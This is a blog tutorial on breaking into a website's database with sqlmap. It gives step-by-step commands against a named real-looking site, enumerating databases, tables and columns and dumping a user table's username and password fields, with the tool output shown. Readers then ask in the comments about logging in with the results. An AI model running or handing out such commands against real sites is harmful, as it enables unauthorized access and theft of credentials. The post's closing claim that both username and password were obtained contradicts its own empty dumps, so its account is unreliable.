Hacking Website Database with SQLmap in Backtrack 5 or Linux OS

All we needed is a vulnerability webpage. Lets say you have a url like this

http://www.site.com/section.php?id=51

and that it is prone to sql injection because the developer of that site did not properly escape the parameter id.

This can be simply tested by trying to open the url

http://www.site.com/section.php?id=51'

We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote..

To understand the process please change video quality to 1080p and watch in HD Quality

 
Step 1 – Finding Databases
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 –dbs
 
 
Output
———-
 
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:00:51] [INFO] fetching database names
available databases [2]:
[*] 554777
[*] information_schema

 


 
Step 2 – Finding the table names
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 –tables
 
Output
———-
 
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:25] [INFO] fetching tables for database: '554777'
Database: 554777
[6 tables]
+—————+
| abstract      |
| answer        |
| author        |
| news_details  |
| reporter_list |
| user          |
+—————+

 


 
Step 3 – Finding the columns
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user –columns
 
Output
———-
 
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:48] [INFO] fetching columns for table 'user' in database '554777'
Database: 554777
Table: user
[3 columns]
+———-+————-+
| Column   | Type        |
+———-+————-+
| password | varchar(50) |
| role     | varchar(50) |
| username | varchar(50) |
+———-+————-+

 


 
Step 4 – Finding column values
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C username –dump
 
Output
———-
 
Database: 554777
Table: user
[0 entries]
+———-+
| username |
+———-+
+———-+
 
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C password –dump
 
 
Output
———-
 
Database: 554777
Table: user
[0 entries]
+———-+
| password |
+———-+
+———-+
 
 
So we get both username and password.


 
You can leave a response, or trackback from your own site.

2 Responses to “Hacking Website Database with SQLmap in Backtrack 5 or Linux OS”

  1. Human says:

    If the name is username and password is password, why I cannot login http://abstract.freevar.com/phpmyadmin?

    • Jijo K Jose says:

      Username and password are database user field value. It is not the original phpmyadmin username and password.

      Using the username and password you can only login to the corresponding website only.

      In http://abstract.freevar.com am not included any login page so you can’t login into that website.

Leave a Reply